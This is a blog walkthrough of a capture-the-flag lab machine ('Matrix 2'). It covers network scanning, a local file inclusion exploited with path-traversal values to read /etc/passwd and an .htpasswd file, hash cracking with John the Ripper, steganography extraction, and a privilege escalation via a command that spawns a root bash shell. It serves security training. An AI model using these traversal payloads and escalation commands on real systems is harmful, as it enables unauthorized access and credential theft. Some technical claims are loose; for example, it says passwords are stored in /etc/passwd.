Preaload Image
Back

Secuneus Labs – TryHackMe Walk-through : THE MATRIX 2

Step 1 command = netdiscover -r 192.168.1.0/24

Use this to find all the ip/hosts near you. Here the ip of target machine is 192.168.1.41

Step 2 Use command = nmap -A -sV -p- 192.168.1.41 for aggressive scan

Step 3 following ports are open in the target machine.

As port 80 is open lets check the website running there by searching the target’s ip i.e 192.168.1.41

However we did not find any useful information here. Lets check out the page source of this webpage.

Here we found out a souce named js/index.js. Lets check it out and see if we could find something. Now here we find some line which were not there in webpage and some strings which give us our next hint to check 1337 port. There is also some different words like Cr4sh coD3 which look like some password and username. Lets reserve them for future use.

Step 4 lets check the service on port 1337. 

But one error message is displayed which reads that only HTTPS are accepted. Moreover in nmap scan aslo we saw that https service is running on port 1337 not http. So lets switch the service.

Now we can see a login prompt. But we dont know any login credentials. So lets try other ports where http or https request are running. On checking 12320 port, we again find login page. Webpage on port 12321 is not opening and port 12322 show the main webpage.

Moreover when we do dirb on all these webpage, we could not find any useful data. So lets take another approach here. We know many websites have a default file robots.txt. Lets check if any of the website has this file.

voila…. We found that https://192.168.1.41:12322 has robots.txt file and it even contains some disallowed file i.e is file_view.php. So lets open it. However opening it does not do us any good. Because we see a blank page. But on opening the page source we see a message of missing parameter.

Step 5 upon checking this error message carefully, we see that file parameter is missing. On searching the internet, we get to know that this means that this website has LFI vulnerability (local file inclusion). This vulnerability means that one can access the local files of the server on which website is hosted through this website. Now we know that the operating system of the target is linux based, which means the webroot directory of this website will be /var/www/html and all the password, usernames, request etc are stored in /etc/passwd directory (same like SAM file in windows). So we can use this vulnerability to move from /var/www/html to /etc/passwd. For this we can use burp suite, because we have to add the file parameter to the body of request and also forward this request as POST request. 

Now what we are doing here is that we are using repeater to see the request and response on the same level. Then we changed GET request to POST. and then we started using hit and trial method to get the exact parameter to add. We first added body parameter with name = file and value = /etc/passwd and then forwarded the request. As we got the same result we changed the value of file parameter to ../etc/passwd and started doing this till we got the exact parameter i.e ../../../../../etc/passwd where we see the result as above.

We found one user i.e n30. lets keep it in mind and proceed forward. Upon checking the above data carefully we see that server of the website is nginx (

NGINX is open-source web server software used for reverse proxy, load balancing, and caching. It provides HTTPS server capabilities and is mainly designed for maximum performance and stability.) however nginx server has a folder in it that contains all the configuration of the sites running on it i.e site-available/default. Now we are going to visit this folder through our burpsuite using parameter = file and value = ../../../../../etc/nginx/sites-available/default. 

As we can see a directory named /var/www/p4ss/.htpasswd which might contain some useful things for us. Lets see to it using parameter = file and value = ../../../../../var/www/p4ss/.htpasswd. Voila.. We got a credential i.e Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0

Step 6 now lets crack this hash using john the ripper tool. Use following commands

Touch hash1

Nano hash1

Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0

Ctrl + o

Ctrl + x

John hash1 –wordlist=/usr/share/wordlists/rockyou.txt

Step 7 now lets login to the first authentication page we found i.e at https://192.168.1.41:1337 with credentials = admin and Tr1n17y. After trying the combination we find out tht admin is password and  Tr1n17y is username.

Now we see the same webpage but with a new addition of n30 as highlighted. We have found out n30 as the user in step 5 too. Now this confirms it. We did nnot find anything else here. So lets check the page source.

Well we see a comment about a image h1dd3n.jpg. Now lets explore this jpg file using https://192.168.1.41:1337/h1dd3n.jpg. 

We see am image with some message and nothing more. That means we are struck here again. After giving some thought, we find out that we can hide some message in an image using steganography. What if that is the case with this image. So lets go with the flow and check if our suspicion is right or wrong. So first we downloaded the image and then we used steghide tool to find the hidden text, if any using the command = steghide extract -sf h1dd3n.jpg -xf matrix2.txt. Here -sf is to clarify the image used and -xf is for the file where we want to save the hidden message.

However we are again stuck when we were asked for a password. This confirm that there is some hidden text. But from where do we get password for this. After giving it some thought, we find out that n30 was highlighted red on the webpage before. What if n30 is password. Lets try it.

great , we got the hidden text. That means n30 was the password for the h1dd3n.jpg file and our user too. After reading matrix2.txt we got the password P4$$w0rd, which definitely will be for user n30.

Step 8 we got the username = n30 and password = P4$$w0rd. So lets try to log in to our second authentication page on website https://192.168.1.41:12320

And see we got the access. Now we have to find the root flag. So lets do command = ls -al to what all there in the target.

We see many folders and files but one file that interests us is .bash_history. Which we knows that contains all the history of commands that has been used in the target. So lets open this using command = cat .bash_history and check out the history. We might find some hint.

After opening the file, we see that following commands has been used again and again:

Id

Morpheus ‘BEGIN {system(“/bin/bash”)}’

Id

Cd /root

Cat flag.txt

So lets try these commands as we can see that after doing the command = morpheus ‘BEGIN {system(“/bin/bash”)}’ we got the root access. So this might be the approach that we have to follow.

Voila….after using the morpheus command we got the root access. So now all we have to do is go to root and find the flag using following commands:

Id

Cd ..

Ls

Cd ..

Ls’cd root

Ls

Cat flag.txt

This CTF walkthrough created by Nishtha Kumari

Secuneus Tech

You may also like

Secuneus Labs – TryHackMe Walk-through : Misdirection 1
December 9, 2023

Penetration Testing Methodologies Network Scan Enumeration Exploit Privilege Escalation Walkthrough Step 1 : Run Netdiscover tool to check all the devices connected on the same network from where you can get the IP of the target.The IP found here is …

Secuneus TryHackme Walkthrough : MyFileServer 2
December 9, 2023

Penetration Testing Methodologies Network Scan ·        Netdiscover ·        Nmap Enumeration ·        Nikto ·        Telnet ·        Smbmap Exploit Privilege Escalation Walkthrough Step 1: Run Netdiscover tool …

Secuneus Labs – TryHackMe Walk-through : W34kn3ss-1
December 9, 2023

Step 1 command = netdiscover -r 192.168.1.0/24 Use this to find all the ip/hosts near you. Here the ip of target machine is 192.168.1.42 Step 2 Use command = nmap -A -sV -p- 192.168.1.42 for aggressive scan Step 3 We …